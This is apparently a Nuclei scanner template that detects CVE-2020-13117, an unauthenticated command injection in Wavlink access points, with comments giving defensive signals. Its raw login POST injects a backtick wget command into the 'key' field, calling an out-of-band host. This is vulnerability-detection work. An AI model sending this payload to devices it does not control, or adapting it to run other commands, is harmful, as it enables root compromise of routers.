# Nuclei detection template for CVE-2020-13117: unauthenticated command
# injection through the "key" parameter of the Wavlink login CGI.
id: CVE-2020-13117

info:
  name: Wavlink Multiple AP - Unauthenticated RCE
  author: gy741
  severity: critical
  # Folded block scalar: the line breaks below are joined with single spaces,
  # giving the same one-line description as before.
  description: >-
    Several Wavlink products are affected by a vulnerability that may allow
    remote unauthenticated users to execute arbitrary commands as root on
    Wavlink devices. The user input is not properly sanitized
    which allows command injection via the "key" parameter in a login request.
    It has been tested on Wavlink WN575A4 and WN579X3 devices, but other
    products may be affected.
  reference:
    - https://blog.0xlabs.com/2021/02/wavlink-rce-CVE-2020-13117.html
  classification:
    # Vector reads as: reachable over the network, low complexity, no
    # privileges and no user interaction, high impact on C, I and A.
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-13117
    # CWE-77 is the command-injection weakness class.
    cwe-id: CWE-77
  metadata:
    verified: true
    # Page-title fingerprint of the device login page.
    shodan-query: 'http.title:"Wi-Fi APP Login"'
  tags: cve,cve2020,wavlink,rce,oast,router

requests:
  # One login POST, sent with no session and no valid credentials. The "key"
  # field is the injection point named in the description; the other fields
  # look like ordinary login-form data. On a vulnerable device the probe
  # causes an HTTP request to the scanner's interactsh host, so execution is
  # confirmed out-of-band rather than from the response alone.
  # Defensive signal: shell metacharacters (quote, semicolon, backtick) in the
  # "key" field of POSTs to /cgi-bin/login.cgi, and outbound HTTP/DNS from the
  # access point to hosts it has no reason to contact.
  # NOTE(review): the template has no remediation field; the reference above
  # is the only pointer to fix status.
  - raw:
      - |
        POST /cgi-bin/login.cgi HTTP/1.1
        Host: {{Hostname}}
        Origin: http://{{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Accept-Encoding: gzip, deflate

        newUI=1&page=login&username=admin&langChange=0&ipaddr=192.168.1.66&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2F{{interactsh-url}}%3B%60%3B%23&password=asd&lang_select=en

    # All three matchers must hold. The interactsh hit is the evidence of
    # command execution; the body and status checks only tie the hit to the
    # expected login response and cut false positives.
    matchers-condition: and
    matchers:
      # Confirms the HTTP interaction recorded by interactsh.
      - type: word
        part: interactsh_protocol
        words:
          - 'http'

      # NOTE(review): presumably the script redirect returned by the login
      # CGI; confirm against a real device response.
      - type: word
        part: body
        words:
          - 'parent.location.replace'

      - type: status
        status:
          - 200